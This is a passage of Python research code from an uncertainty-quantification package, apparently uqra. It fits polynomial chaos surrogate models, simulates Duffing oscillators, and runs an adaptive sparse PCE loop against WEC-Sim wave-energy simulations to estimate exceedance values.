tqdm.write(' > Summary PCE: ndim={:d}, p={:d}'.format(ndim, deg))
# tqdm.write(' - {:<15s} : {}'.format( 'QoI' , QoI))
tqdm.write(' - {:<15s} : {}'.format( 'RMSE y ' , np.array(data.rmse_y)))
tqdm.write(' - {:<15s} : {}'.format( 'CV MSE' , np.array(data.cv_err)))
tqdm.write(' - {:<15s} : {}'.format( 'Score ' , np.array(data.score)))
# tqdm.write(' - {:<15s} : {}'.format( 'kappa ' , data.kappa))
tqdm.write(' - {:<15s} : {} [{}]'.format( 'pf ' , np.array(data.pf_hat), data_test.pf))
print(uqra.metrics.mquantiles(y_test_hat, 1-pf))
setattr(output_indim_ideg, idoe_nickname, data)
output_ndim_deg.append(output_indim_ideg)
isOverfitting(deg_stop_cv_err) ## check Overfitting
is_converge, pf_hat, pf_hat_err = check_converge(deg_stop_pf_hat, abs_tol=1e-4)
print(' > pf: {}, pf abs_err: {}'.format(np.array(deg_stop_pf_hat), pf_hat_err))
if is_converge:
print('Simulation Done')
print(' ------------------------------')
break
## ============ Saving QoIs ============
filename = '{:s}_Adap{:s}_{:s}E5R{:d}'.format(solver.nickname, pce_model.tag, doe_params.doe_sampling.capitalize(), r)
try:
np.save(os.path.join(data_dir_result, filename), output_ndim_deg, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(data_dir_result, filename)))
except:
np.save(os.path.join(os.getcwd(), filename), output_ndim_deg, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(os.getcwd(), filename)))
if __name__ == '__main__':
main(0)
```
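The convergence criterion above compares successive failure-probability estimates `pf_hat = #{y_hat < 0}/N` with an absolute tolerance. A minimal sketch of that bookkeeping, with synthetic predictions standing in for the PCE surrogate:
```python
import numpy as np

def estimate_pf(y_hat):
    """Empirical failure probability: fraction of surrogate predictions below zero."""
    y_hat = np.asarray(y_hat)
    return np.sum(y_hat < 0) / len(y_hat)

rng = np.random.default_rng(0)
pf_history = []
for iteration in range(5):
    # stand-in for pce_model.predict(u_test): Gaussian with a small left tail below zero
    y_hat = rng.normal(loc=3.6, scale=1.0, size=1_000_000)
    pf_history.append(estimate_pf(y_hat))
    if len(pf_history) >= 2 and abs(pf_history[-2] - pf_history[-1]) <= 1e-4:
        print('converged: pf_hat ~ {:.3e} after {:d} iterations'.format(pf_history[-1], iteration + 1))
        break
```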
#### File: examples/duffing/duffing.py
```python
import context
import chaospy as cp
import numpy as np
import scipy.signal as spsignal
import envi, doe, solver, utilities
from envi import environment
from metaModel import metaModel
from simParams import simParameter
from run_sim import run_sim
from solver.dynamic_models import lin_oscillator
from solver.dynamic_models import duffing_oscillator
from solver.static_models import ishigami
from solver.static_models import poly5
from utilities.gen_gauss_time_series import gen_gauss_time_series
import uqplot.plot_solver as psolver
import matplotlib.pyplot as plt
from statsmodels.distributions.empirical_distribution import ECDF
import matplotlib.cm as cm
from mpl_toolkits.mplot3d import Axes3D
import time
def main():
## Duffing oscillator problem
## Ref: Dr. <NAME>
## -- source function S(w) = c/(c^2 + w^2), with c ~ LogNormal()
## --
    ## Exceedance probability
pf = 1e-4
## ------------------------------------------------------------------- ###
## Define Solver parameters ###
## ------------------------------------------------------------------- ###
    ## Choose Wiener-Askey scheme random variable
dist_zeta = cp.Gamma() # shape=1, scale=1, shift=0
## If transformation needed, like Rosenblatt, need to be done here
    ## Define the independent random variable in the physical problem
    dist_x = cp.Lognormal(0,0.5) # lognormal; underlying normal has mean=0, std=0.5
    # dist_x = [cp.Uniform(-1,1), cp.Uniform(-1,1)]
print(dist_x.inv(pf))
print(dist_x.inv(1-pf))
## Define solver system properties
sys_params = np.array([0,0,0.02,1,0.15]).reshape(5,1) #x0,v0, zeta, omega_n, mu
# ------------------------------------------------------------------- ###
# Define simulation parameters ###
# ------------------------------------------------------------------- ###
## Parameters to generate solver system input signal
source_kwargs= {'name': 'T1', 'method':'ifft', 'sides':'double'}
source_func = gen_gauss_time_series
sys_source = [source_func, source_kwargs]
## Parameters to design of experiments
# doe_method, doe_rule, doe_order = 'GQ','lag',[9]*10
sample_points_x = dist_zeta.inv(dist_x.cdf(np.arange(1,25)))
doe_method, doe_rule, doe_order = 'FIX',sample_points_x , [len(sample_points_x )]*10
# doe_method, doe_rule, doe_order = 'MC','R', [20]
doe_params = [doe_method, doe_rule, doe_order]
print(len(doe_params))
## Parameters to the time indexing
time_start, time_ramp, time_max, dt = 0,0,200,0.1
time_params = [time_start, time_ramp, time_max, dt]
## parameters to post analysis
out_responses = [0,]
stats = [1,1,1,1,1,1,0] # [mean, std, skewness, kurtosis, absmax, absmin, up_crossing, moving_avg, moving_std]
post_params = [out_responses, stats]
normalize = True
quad_simparam = simParameter(dist_zeta, doe_params = doe_params, \
time_params = time_params, post_params = post_params,\
sys_params = sys_params, sys_source = sys_source, normalize=normalize)
quad_simparam.set_seed([1,100])
## Get DOE samples
doe_samples_zeta, doe_samples_phy = quad_simparam.get_doe_samples(retphy=True,dist_phy=dist_x)
print(doe_samples_zeta)
print(doe_samples_phy)
## Run simulation
# ### ------------------------------------------------------------------- ###
# ### Run Simulations for training data ###
# ### ------------------------------------------------------------------- ###
# print(doe_samples_phy[0][0][0,1])
training_set_x = doe_samples_phy
training_set_y = run_sim(duffing_oscillator, quad_simparam)
training_set = [training_set_x, training_set_y]
# ## save training x
# _training_set_x = training_set_x[0]
# for i in np.arange(1,len(doe_order)):
# _training_set_x=np.hstack((_training_set_x,training_set_x[i]))
# np.savetxt('training_set_x.csv', np.array(_training_set_x).T, delimiter=',')
# ## save training y
# icount = 0
# for itraining_set_y in training_set_y:
# for i in np.arange(itraining_set_y.shape[0]):
# for j in np.arange(itraining_set_y.shape[1]):
# np.savetxt('training_set_y_{:d}.csv'.format(icount), np.squeeze(itraining_set_y[i,j,:,:]),delimiter=',')
# icount+=1
# _training_set_x=[]
for idoeset in np.arange(len(doe_order)):
itraining_set_x = training_set_x[idoeset]
itraining_set_y = training_set_y[idoeset]
np.save('Fixx_{:d}'.format(idoeset), np.array(training_set_x[idoeset]))
np.save('Fixy_{:d}'.format(idoeset), np.array(training_set_y[idoeset]))
# print(training_set_x[0].shape)
# print(training_set_x[1].shape)
# print(training_set_y[0].shape)
# print(training_set_y[1].shape)
# y = np.squeeze(training_set_y[0][0,0,:,:])
# t = np.squeeze(training_set_y[0][0,0,:,0])
# y_std = []
# for i in range(1,len(y)):
# y_std.append(np.std(y[:i]))
# plt.figure()
# plt.plot(t[1:],np.array(y_std))
# plt.plot(t,y)
# plt.show()
# x0,v0, zeta, omega_n, mu = sys_params
# x0,v0, zeta, omega_n, mu = x0[0],v0[0], zeta[0], omega_n[0], mu[0]
# delta = 2 * zeta * omega_n
# alpha = omega_n**2
# beta = omega_n**2 * mu
# print('delta: {:.2f}, alpha: {:.2f}, beta: {:.2f}'.format(delta, alpha, beta))
# psolver.duffing_equation(x0,v0,delta, alpha, beta,y)
# print(np.array(training_set_y).shape)
# f_obsY = []
# for idoe_samples_phy in doe_samples_phy:
# # training_set_y = run_sim(lin_oscillator, idoe_samples_phy, quad_simparam,\
# # sys_params=sys_params, psd_params=psd_params)
# training_set_y = run_sim(duffing_oscillator, idoe_samples_phy, quad_simparam,\
# sys_params=sys_params, psd_params=psd_params)
# # training_set_y = run_sim(poly5, idoe_samples_phy, quad_simparam)
# f_obsY.append(training_set_y)
# print(np.array(f_obsY).shape)
# f_obsY_max = np.max(f_obsY, axis=-2)
# print(f_obsY_max)
# plt.figure()
# plt.plot(training_set_y[0,:,0], training_set_y[0,:,1])
# plt.show()
#### ------------------------------------------------------------------- ###
#### Define meta model parameters ###
#### ------------------------------------------------------------------- ###
# fit_method = 'SP' # SP: spectral projection, RG: regression
# quad_metamodel = metaModel('PCE', [5], fit_method, dist_zeta)
# ### ------------------------------------------------------------------- ###
# ### Define environmental conditions ###
# ### ------------------------------------------------------------------- ###
# siteEnvi = environment(quad_simparam.site)
# ### ------------------------------------------------------------------- ###
# ### Fitting meta model ###
# ### ------------------------------------------------------------------- ###
# for a in f_obsX:
# print(a.shape)
# for a in f_obsY:
# print(a.shape)
# # for a in f_obsYstats:
# # print(a.shape)
# # istats, iqoi = 5, 0 # absmax
# datax = [x[:len(dist_zeta),:] for x in f_obsX]
# datay = f_obsY #[y[:,istats, iqoi] for y in f_obsY]
# # dataw = [x[len(dist_zeta),:] for x in f_obsX]
# quad_metamodel.fit_model(datax, datay)
# print(quad_metamodel.f_hats[0][0])
# # print(quad_metamodel.f_hats)
# ## ------------------------------------------------------------------- ###
# ## Cross Validation ###
# ## ------------------------------------------------------------------- ###
# quad_metamodel.cross_validate(validatax, validatay)
# print (' Fitting Error:', quad_metamodel.fit_l2error)
# print (' Cross Validation Error:', quad_metamodel.cv_l2errors)
# ### ------------------------------------------------------------------- ###
# ### Prediction ###
# ### ------------------------------------------------------------------- ###
# models_chosen = [[0,1],[1,0]]
# meta_pred = quad_metamodel.predict(1E2,R=10)
# metamodel1 = quad_metamodel.f_hats[0][0]
# datay1 = metamodel1(*datax[0])
# print(datay[0].shape)
# print(datay1.shape)
# n_bins = 100
# fig, ax = plt.subplots(figsize=(8, 4))
# # plot the cumulative histogram
# n, bins, patches = ax.hist(datay[0], n_bins, normed=1, histtype='step',
# cumulative=True, label='True value')
# ax.hist(datay1.T, n_bins, normed=1, histtype='step',cumulative=True, label='Fitted value' )
# # tidy up the figure
# ax.grid(True)
# ax.legend(loc='right')
# ax.set_title('Cumulative step histograms')
# ax.set_xlabel('Annual rainfall (mm)')
# ax.set_ylabel('Likelihood of occurrence')
# plt.show()
if __name__ == '__main__':
main()
```
#### File: examples/duffing/plot_duffing.py
```python
import context
import numpy as np
from uqra.environment import environment
from uqra.metaModel import metaModel
from uqra.simParameters import simParameters
from uqra.run_sim import run_sim
from uqra.solver.dynamic_models import lin_oscillator
from uqra.solver.dynamic_models import duffing_equation
from uqra.solver.dynamic_models import duffing_oscillator
from uqra.solver.benchmark import ishigami
from uqra.solver.benchmark import bench1
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sbs
# The potential and its first derivative, as callables.
# V = lambda x: 0.5 * x**2 * (0.5 * x**2 - 1)
# dVdx = lambda x: x**3 - x
# # The potential energy function on a grid of x-points.
# xgrid = np.linspace(-1.5, 1.5, 100)
# Vgrid = V(xgrid)
# plt.plot(xgrid, Vgrid)
# plt.xlabel('$x$')
# plt.ylabel('$V(x)$')
# Set up the motion for an oscillator with initial position
# x0 and initially at rest.
x0, v0 = 0, 0
tmax, t_trans = 180, 30
omega = 1.4
gamma, delta = 0.39, 0.1
dt_per_period = 100
alpha, beta = 1, 1
# Solve the equation of motion.
source_func =lambda t, kwargs=None: gamma*np.cos(omega*t)
t, X, dt, pstep = duffing_equation(tmax, dt_per_period, x0, v0, gamma, delta, omega, t_trans=t_trans, alpha=alpha, beta = beta)
x, xdot = X.T
dt = 2*np.pi/omega/dt_per_period
omega0 = np.sqrt(alpha)
mu = beta/alpha
zeta = delta/(2*omega0)
t1, X1, dt1, pstep1 = duffing_oscillator(tmax, dt, x0, v0, zeta,omega0,mu, t_trans=t_trans,source_func=source_func)
x1, xdot1 = X1.T
# # The animation
fig, ax = plt.subplots(nrows=2,ncols=2)
# ax1 = ax[0,0]
# ax1.plot(xgrid, Vgrid)
# ax1.set_ylim(-0.3, 0.15)
# ln1, = ax1.plot([], [], 'mo')
# ax1.set_xlabel(r'$x / \mathrm{m}$')
# ax1.set_ylabel(r'$V(x) / \mathrm{J}$')
# Position as a function of time
ax2 = ax[1,0]
ax2.set_xlabel(r'$t / \mathrm{s}$')
ax2.set_ylabel(r'$x / \mathrm{m}$')
# ln2, = ax2.plot(t[:100], x[:100])
ln2, = ax2.plot(t, x)
ln2, = ax2.plot(t1, x1)
ax2.set_ylim(np.min(x), np.max(x))
# Phase space plot
ax3 = ax[1,1]
ax3.set_xlabel(r'$x / \mathrm{m}$')
ax3.set_ylabel(r'$\dot{x} / \mathrm{m\,s^{-1}}$')
ln3, = ax3.plot([], [])
ax3.set_xlim(np.min(x), np.max(x))
ax3.set_ylim(np.min(xdot), np.max(xdot))
# Poincaré section plot
ax4 = ax[0,1]
ax4.set_xlabel(r'$x / \mathrm{m}$')
ax4.set_ylabel(r'$\dot{x} / \mathrm{m\,s^{-1}}$')
ax4.scatter(x[::pstep], xdot[::pstep], s=2, lw=0, c=sbs.color_palette()[0])
scat1 = ax4.scatter([x0], [v0], lw=0, c='m')
plt.tight_layout()
plt.show()
# def animate(i):
# """Update the image for iteration i of the Matplotlib animation."""
# ln1.set_data(x[i], V(x[i]))
# ln2.set_data(t[:i+1], x[:i+1])
# ax2.set_xlim(t_trans, t[i])
# ln3.set_data(x[:i+1], xdot[:i+1])
# if not i % pstep:
# scat1.set_offsets(X[i])
# return
# anim = animation.FuncAnimation(fig, animate, frames=len(x), interval=1)
# Writer = animation.writers['ffmpeg']
# writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)
# anim.save('duffing.mp4', writer=writer)
```
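The parameter mapping in the script (`delta = 2*zeta*omega0`, `alpha = omega0**2`, `beta = alpha*mu`) corresponds to the forced Duffing equation x'' + delta*x' + alpha*x + beta*x^3 = gamma*cos(omega*t). A minimal sketch integrating that equation directly with SciPy, as a cross-check independent of the uqra solvers (hypothetical, reusing the parameter values above):
```python
import numpy as np
from scipy.integrate import solve_ivp

# Parameter values reused from the script above
x0, v0 = 0.0, 0.0
omega, gamma, delta = 1.4, 0.39, 0.1
alpha, beta = 1.0, 1.0
tmax = 180.0

def duffing_rhs(t, state):
    """First-order form of x'' + delta*x' + alpha*x + beta*x**3 = gamma*cos(omega*t)."""
    x, xdot = state
    return [xdot, gamma * np.cos(omega * t) - delta * xdot - alpha * x - beta * x ** 3]

t_eval = np.linspace(0.0, tmax, 4000)
sol = solve_ivp(duffing_rhs, (0.0, tmax), [x0, v0], t_eval=t_eval, rtol=1e-8)
x, xdot = sol.y
print('x range: [{:.3f}, {:.3f}]'.format(x.min(), x.max()))
```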
#### File: examples/RM3/RM3_AdapSPCE_SingleQoI.py
```python
import uqra
import numpy as np, os, sys, io
import scipy.stats as stats
from tqdm import tqdm
import itertools, copy, math, collections
import multiprocessing as mp
import random
import scipy
import matlab.engine
# warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
def overfitting_check(cv_err):
"""
    If the CV error increases twice in a row, the fit is treated as overfitting.
    Returns (True, last three CV errors) if overfitting, otherwise (False, nan).
"""
if len(cv_err) < 3 :
return False, np.nan
elif cv_err[-1] > cv_err[-2] and cv_err[-2] > cv_err[0]:
return True, cv_err[-3:]
else:
return False, np.nan
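# Example (added for illustration): the CV error rises twice in a row, so the last three
# values are flagged:
#   overfitting_check([0.08, 0.09, 0.12]) -> (True, [0.08, 0.09, 0.12])
#   overfitting_check([0.10, 0.08])       -> (False, nan)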
def threshold_converge(y, threshold=0.9):
y = np.array(y)
if len(y) == 0:
return False, np.nan
else:
status = True if y[-1]> threshold else False
return status, y[-1]
def relative_converge(y, err=0.05):
"""
    Check whether y has converged in relative error.
    return: (status, error)
        status: Boolean, converged or not
        error : relative error between the last two entries
"""
y = np.array(y)
if len(y) < 2:
res = (False, np.nan)
else:
error = abs((y[-2]-y[-1])/ y[-1])
res = (error < err, error)
return res
def absolute_converge(y, err=1e-4):
"""
    Check whether y has converged in absolute error.
    return: (status, error)
        status: Boolean, converged or not
        error : absolute error between the last two entries
"""
y = np.array(y)
if len(y) < 2:
res = (False, np.nan)
else:
error = abs(y[-2]-y[-1])
res = (error < err, error)
return res
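# Examples (added for illustration):
#   relative_converge([10.0, 10.4], err=0.05) -> (True, ~0.0385)   # |10.0-10.4|/10.4
#   absolute_converge([1.20e-4, 1.25e-4])     -> (True, ~5e-06)
#   absolute_converge([1.20e-4])              -> (False, nan)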
def main(model_params, doe_params, solver, r=0, random_state=None, theta=None):
random.seed(random_state)
## ------------------------ Initialize parameters ----------------- ###
ndim = model_params.ndim
ndim_deg_cases = np.array(list(itertools.product([model_params.ndim,], model_params.degs)))
    ### data object containing results from intermediate steps
## attribute ending with '_' is a collection of variables after each iteration
data_init = uqra.Data()
data_init.ndim = ndim
data_init.y0_hat_ = []
data_init.cv_err_ = []
data_init.model_ = []
data_init.score_ = []
data_init.DoI_xi_ = []
data_init.DoI_x_ = []
data_init.data_train_ = []
data_init.exploration0 = None## initial exploration sample set
data_init.exploration_ = [] ## exploration sample sets added later
data_init.exploitation_= [] ## exploitation sample sets added later
data_init.deg_converge = False
data_init.deg_overfit = False
data_init.iteration_converge = False
## ------------------------ list of Data obj for all QoIs ----------------- ###
## data object while building p-order PCE iteratively
## attribute ending with '_' is a collection of variables after each iteration
data_QoIs = [copy.deepcopy(data_init) for _ in range(34)]
    ## nested list: data_degs_QoIs[ideg][iqoi], 34 outputs in total
data_degs_QoIs = [copy.deepcopy(data_QoIs) for _ in range(model_params.degs[-1])]
for iqoi in model_params.channel:
random.seed(random_state)
deg = model_params.degs[0]
max_sparsity = 6 ## initialize n_samples
### object contain all training samples
data_train = uqra.Data()
data_train.xi_index = []
data_train.xi = np.empty((model_params.ndim, 0))
data_train.x = np.empty((model_params.ndim, 0))
data_train.y = np.empty((0,34))
while deg < model_params.degs[-1]:
print('\n==================================================================================')
print(' <<<< UQRA Sparse PCE Model: ndim={:d}, p={:d} >>>>'.format(ndim, deg))
print(' < QoI: {:s} >'.format(headers[iqoi]))
print('==================================================================================\n')
data_ideg_QoIs = data_degs_QoIs[deg] ## list of uqra.Data()
data_ideg_QoIs[iqoi].deg = deg
            ## data_ideg_QoIs was assigned before: overfitting occurred for some QoIs
            ## new results will be appended to the current results for order p = deg
            ## however, for higher-order models, results will be cleared
if data_ideg_QoIs[iqoi].deg_overfit:
## clear results for all higher order
for ideg in range(deg+1, model_params.degs[-1]):
## data_degs_QoIs[ideg] either empty list (not reach this order yet) or list of 34 uqra.Data()
data_degs_QoIs[ideg][iqoi] = data_init
## ------------------------ Updating DoE parameters ----------------- ###
idoe_params = copy.deepcopy(doe_params)
idoe_params.ndim = ndim
idoe_params.deg = int(deg)
### Specify candidate data filename template function
idoe_params.update_filenames(filename_template=None)
filename_cand = idoe_params.fname_cand(r)
# filename_design = idoe_params.fname_design(r)
print(' - {:<23s} : {}'.format(' Candidate filename' , filename_cand ))
if filename_cand:
data_cand = np.load(os.path.join(data_dir_cand, filename_cand))
data_cand = data_cand[:ndim,random.sample(range(data_cand.shape[1]), k=idoe_params.num_cand)]
data_cand = data_cand * deg ** 0.5 if doe_params.doe_sampling.upper() in ['CLS4', 'CLS5'] else data_cand
print(' {:<23s} : {}'.format(' shape', data_cand.shape))
else:
data_cand = None
print(' {:<23s} : {}'.format(' shape', data_cand))
print(' - {:<23s} : {}'.format(' UQRA DoE ' ,idoe_params.doe_nickname()))
## ------------------------ UQRA Surrogate model----------------- ###
orth_poly = uqra.poly.orthogonal(ndim, deg, model_params.basis)
dist_xi = orth_poly.weight
### ------------------------ #1: Obtain exploration optimal samples ----------------- ###
print(' ------------------------------------------------------------')
print(' Initial exploration optimal samples in global domain based on FULL basis: {:s}'.format(idoe_params.doe_nickname()))
print(' ------------------------------------------------------------')
print(' > Adding exploration samples in global domain... ')
            ### optimal samples are available in global_data; optimal designs are still processed here to confirm those samples are correct
# samples from optimal design
n_samples = max(max_sparsity, math.ceil(0.8*orth_poly.num_basis))
xi_exploration0, idx_optimal = idoe_params.get_samples(data_cand, orth_poly, n_samples, x0=[],
active_index=None, initialization='RRQR', return_index=True)
print(' - {:<32s} : {:d}'.format('Adding exploration optimal samples', n_samples))
### some samples are cached for quick access.
x_exploration0 = solver.map_domain(xi_exploration0, dist_xi)
ii = np.where(np.array([iglobal_data.deg for iglobal_data in global_data]) == deg)[0][0]
iglobal_data = global_data[ii]
# if samples are evaluated before, use those directly
if np.amax(abs(xi_exploration0-iglobal_data.xi_train[:,:n_samples])) > 1e-6 \
or np.amax(abs(x_exploration0-iglobal_data.x_train[:,:n_samples])) > 1e-6 :
print(' - x/xi values in cached data not match, running WEC-Sim ...')
print(xi_exploration0)
print(iglobal_data.xi_train[:,:n_samples])
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
y_exploration0 = []
for iHs, iTp in tqdm(x_exploration0.T, ncols=80, desc=' - [WEC-SIM]' ):
eng.workspace['Hs'] = float(iHs)
eng.workspace['Tp'] = float(iTp)
# eng.wecSim(nargout=0)
eng.wecSim(nargout=0,stdout=out,stderr=err)
y_exploration0.append(np.squeeze(eng.workspace['maxima'])[2:]) ## first two are Hs,Tp
y_exploration0 = np.array(y_exploration0)
else:
print(' - Retrieving cached data n={:d}...'.format(n_samples))
y_exploration0 = iglobal_data.y_train[:n_samples,:,theta] ## shape (nsample, nQoIs, n_short_term)
data_exploration0 = uqra.Data()
data_exploration0.xi= xi_exploration0
data_exploration0.x = x_exploration0
data_exploration0.y = y_exploration0
data_train.xi = np.concatenate([data_train.xi, xi_exploration0], axis=1)
data_train.x = np.concatenate([data_train.x , x_exploration0 ], axis=1)
data_train.y = np.concatenate([data_train.y , y_exploration0 ], axis=0)
data_train.xi_index = uqra.list_union(data_train.xi_index, idx_optimal)
data_ideg_QoIs[iqoi].exploration0= data_exploration0
data_ideg_QoIs[iqoi].data_train_.append(copy.deepcopy(data_train))
print(' ------------------------------------------------------------')
print(' Build PCE (p={:d}) model with {} '.format(deg, model_params.fitting))
if np.amax(abs(data_train.x-solver.map_domain(data_train.xi, dist_xi))) > 1e-6:
print(data_train.x[:,:3])
print(solver.map_domain(data_train.xi, dist_xi)[:,:3])
raise ValueError
weight = idoe_params.sampling_weight() ## weight function
data_train= data_ideg_QoIs[iqoi].data_train_[-1]
pce_model = uqra.PCE(orth_poly)
dist_u = model_params.dist_u
dist_xi = orth_poly.weight
dist_x = solver.distributions
pce_model.info()
print(' - {:<32s} : ({},{}), Alpha: {:.2f}'.format('X train', data_train.x.shape[1],
pce_model.num_basis, data_train.x.shape[1]/pce_model.num_basis))
print(' - {:<32s} : {}'.format('Y train' , data_train.y[:,iqoi].shape))
print(' - {:<32s} : {}'.format('Y test ' , xi_test.shape))
pce_model.fit(model_params.fitting, data_train.xi, data_train.y[:, iqoi]/model_params.y_scales[iqoi],
w=weight,n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].sparsity = len(pce_model.active_index)
y_test_hat = pce_model.predict(xi_test, n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].model_.append(pce_model)
data_ideg_QoIs[iqoi].score_.append(pce_model.score)
data_ideg_QoIs[iqoi].cv_err_.append(pce_model.cv_error)
max_sparsity = max(max_sparsity, data_ideg_QoIs[iqoi].sparsity)
data_excd = uqra.Data()
data_excd.pf = model_params.pf
data_excd.y0_hat = uqra.metrics.mquantiles(y_test_hat, 1-model_params.pf)
data_excd.x0_hat = x_test [:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
data_excd.xi0_hat= xi_test[:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
eng.workspace['Hs'] = float(data_excd.x0_hat[0])
eng.workspace['Tp'] = float(data_excd.x0_hat[1])
eng.wecSim(nargout=0,stdout=out,stderr=err)
y0 = np.squeeze(eng.workspace['maxima'])[2:] ## first two are Hs,Tp
data_excd.y0 = y0[iqoi]/model_params.y_scales[iqoi]
data_ideg_QoIs[iqoi].y0_hat_.append(data_excd)
print(' - {:<32s} : {}'.format('Sparsity', data_ideg_QoIs[iqoi].sparsity))
            print(' - {:<32s} : x0={}, y0={:.4e}'.format('Estimated exceedance value',data_excd.x0_hat, data_excd.y0_hat))
print(' - {:<32s} : y={:.4e}, err={:.2f} %'.format('Response with true system at x0', data_excd.y0,
(data_excd.y0_hat - data_excd.y0)/data_excd.y0 *100))
## don't waste data, save this one sample into training set
data_train.xi = np.concatenate([data_train.xi, data_excd.xi0_hat.reshape(ndim, 1)], axis=1)
data_train.x = np.concatenate([data_train.x , data_excd.x0_hat.reshape(ndim, 1)], axis=1)
data_train.y = np.concatenate([data_train.y , y0.reshape(1,-1)], axis=0)
data_ideg_QoIs[iqoi].data_train_[-1]= copy.deepcopy(data_train)
#############################################################################
#############################################################################
i_iteration = 1
while i_iteration <= 20:
# print(' ------------------------------------------------------------')
print(' Sequential Optimal Design: Iteration # {:d} >'.format(i_iteration))
# print(' ------------------------------------------------------------')
n_samples = min(3, max(3,max_sparsity))
print(' > 1. exploration step (FULL basis)... ')
print(' - {:<32s} : {:d}'.format('Adding exploration optimal samples', n_samples))
####-------------------------------------------------------------------------------- ####
# min(max_sparsity, model_params.alpha *pce_model.num_basis - n_samples_deg, 5)
# n_samples = min(10, max_sparsity) #len(active_index)
xi_exploration, idx_optimal = idoe_params.get_samples(data_cand, orth_poly, n_samples, x0=data_train.xi_index,
active_index=None, initialization='RRQR', return_index=True)
assert xi_exploration.shape[1] == n_samples ## make sure return number of samples required
x_exploration = solver.map_domain(xi_exploration, dist_xi)
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
y_exploration = []
for iHs, iTp in tqdm(x_exploration.T, ncols=80, desc=' - [WEC-SIM]' ):
eng.workspace['Hs'] = float(iHs)
eng.workspace['Tp'] = float(iTp)
# eng.wecSim(nargout=0)
eng.wecSim(nargout=0,stdout=out,stderr=err)
y_exploration.append(np.squeeze(eng.workspace['maxima'])[2:]) ## first two are Hs,Tp
y_exploration = np.array(y_exploration)
## save exploration data
data_exploration = uqra.Data()
data_exploration.xi= xi_exploration
data_exploration.x = x_exploration
data_exploration.y = y_exploration
data_ideg_QoIs[iqoi].exploration_.append(data_exploration)
data_train.xi = np.concatenate([data_train.xi, xi_exploration], axis=1)
data_train.x = np.concatenate([data_train.x , x_exploration ], axis=1)
data_train.y = np.concatenate([data_train.y , y_exploration ], axis=0)
data_train.xi_index = uqra.list_union(data_train.xi_index, idx_optimal)
data_ideg_QoIs[iqoi].data_train_.append(copy.deepcopy(data_train))
print(' ------------------------------------------------------------')
print(' Build PCE (p={:d}) model with {} '.format(deg, model_params.fitting))
if np.amax(abs(data_train.x-solver.map_domain(data_train.xi, dist_xi))) > 1e-6:
print(data_train.x[:,:3])
print(solver.map_domain(data_train.xi, dist_xi)[:,:3])
raise ValueError
pce_model = uqra.PCE(orth_poly)
weight = doe_params.sampling_weight() ## weight function
print(' - {:<32s} : ({},{}), Alpha: {:.2f}'.format('X train', data_train.x.shape[1],
pce_model.num_basis, data_train.x.shape[1]/pce_model.num_basis))
print(' - {:<32s} : {}'.format('Y train' , data_train.y[:,iqoi].shape))
print(' - {:<32s} : {}'.format('Y test ' , xi_test.shape))
print(' {:<20s}, prediction samples: {}'.format(headers[iqoi], xi_test.shape))
pce_model.fit(model_params.fitting, data_train.xi, data_train.y[:, iqoi]/model_params.y_scales[iqoi],
w=weight,n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].sparsity = len(pce_model.active_index)
y_test_hat = pce_model.predict(xi_test, n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].model_.append(pce_model)
data_ideg_QoIs[iqoi].score_.append(pce_model.score)
data_ideg_QoIs[iqoi].cv_err_.append(pce_model.cv_error)
max_sparsity = max(max_sparsity, data_ideg_QoIs[iqoi].sparsity)
data_excd = uqra.Data()
data_excd.pf = model_params.pf
data_excd.y0_hat = uqra.metrics.mquantiles(y_test_hat, 1-model_params.pf)
data_excd.x0_hat = x_test [:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
data_excd.xi0_hat= xi_test[:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
eng.workspace['Hs'] = float(data_excd.x0_hat[0])
eng.workspace['Tp'] = float(data_excd.x0_hat[1])
eng.wecSim(nargout=0,stdout=out,stderr=err)
y0 = np.squeeze(eng.workspace['maxima'])[2:] ## first two are Hs,Tp
data_excd.y0 = y0[iqoi]/model_params.y_scales[iqoi]
data_ideg_QoIs[iqoi].y0_hat_.append(data_excd)
print(' - {:<32s} : {}'.format('Sparsity', data_ideg_QoIs[iqoi].sparsity))
                print(' - {:<32s} : x0={}, y0={:.4e}'.format('Estimated exceedance value',data_excd.x0_hat, data_excd.y0_hat))
print(' - {:<32s} : y={:.4e}, err={:.2f} %'.format('Response with true system at x0',data_excd.y0,
(data_excd.y0_hat - data_excd.y0)/data_excd.y0*100))
## don't waste data, save this one sample into training set
data_train.xi = np.concatenate([data_train.xi, data_excd.xi0_hat.reshape(ndim, 1)], axis=1)
data_train.x = np.concatenate([data_train.x , data_excd.x0_hat.reshape(ndim, 1)], axis=1)
data_train.y = np.concatenate([data_train.y , y0.reshape(1,-1)], axis=0)
data_ideg_QoIs[iqoi].data_train_[-1]= copy.deepcopy(data_train)
####-------------------------------------------------------------------------------- ####
print(' > 2. exploitation step (SIGNIFICANT basis)... ')
## obtain DoI candidate samples for each QoI
print(' - {:<32s} : {}'.format('Iteration Converge', data_ideg_QoIs[iqoi].iteration_converge))
## obtain candidate samples for each QoI
# data_cand_DoI_iqoi, idx_data_cand_DoI = idoe_params.samples_nearby(data_ideg_QoIs[iqoi].y0_hat_[-1],
# xi_test, data_ideg_QoIs[iqoi].y_test_hat, data_cand, deg, n0=10, epsilon=0.1, return_index=True)
y0_hat_err = abs(data_ideg_QoIs[iqoi].y0_hat_[-1].y0_hat - data_ideg_QoIs[iqoi].y0_hat_[-1].y0)/data_ideg_QoIs[iqoi].y0_hat_[-1].y0
if y0_hat_err < 0.1:
data_cand_DoI_iqoi = idoe_params.domain_of_interest(data_ideg_QoIs[iqoi].y0_hat_[-1].y0_hat, xi_test,
